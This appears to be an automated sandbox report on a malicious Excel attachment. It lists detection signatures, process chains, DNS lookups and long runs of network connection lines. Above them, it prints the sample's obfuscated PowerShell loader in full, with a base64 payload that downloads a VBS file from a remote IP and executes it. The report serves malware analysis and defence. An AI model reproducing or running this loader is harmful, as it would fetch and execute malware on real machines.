INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICA

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Local\Temp\zqzkwm3j.klr.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", ProcessId: 3144, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:38:14.641633+0100	2024197	1	A Network Trojan was detected	23.95.235.29	80	192.168.2.22	49162	TCP
2024-12-12T21:38:19.564144+0100	2024197	1	A Network Trojan was detected	23.95.235.29	80	192.168.2.22	49164	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:38:14.640106+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49162	23.95.235.29	80	TCP
2024-12-12T21:38:19.563688+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	23.95.235.29	80	TCP
2024-12-12T21:38:40.302835+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49171	23.95.235.29	80	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:38:39.254404+0100	2049038	1	A Network Trojan was detected	151.101.1.137	443	192.168.2.22	49167	TCP
2024-12-12T21:38:56.429519+0100	2049038	1	A Network Trojan was detected	151.101.65.137	443	192.168.2.22	49172	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-12T21:38:27.133480+0100	2858795	1	A Network Trojan was detected	192.168.2.22	49165	23.95.235.29	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Euro confirmation Sp.xls

ReversingLabs: Detection: 23%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\~DF634BD35CC9B94982.TMP

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Euro confirmation Sp.xls

Joe Sandbox ML: detected

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta, type: DROPPED

Source: unknown	HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.34.183:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.184:443 -> 192.168.2.22:49169 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdb source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.pdbhP source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdbhP source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.pdb source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdb]sf+ source: powershell.exe, 00000007.00000002.465465325.000000001C40A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: jktc.pro
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: res.cloudinary.com
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee
Source: global traffic	DNS query: name: paste.ee

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 151.101.65.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.21.34.183:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 172.67.163.184:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 151.101.1.137:443
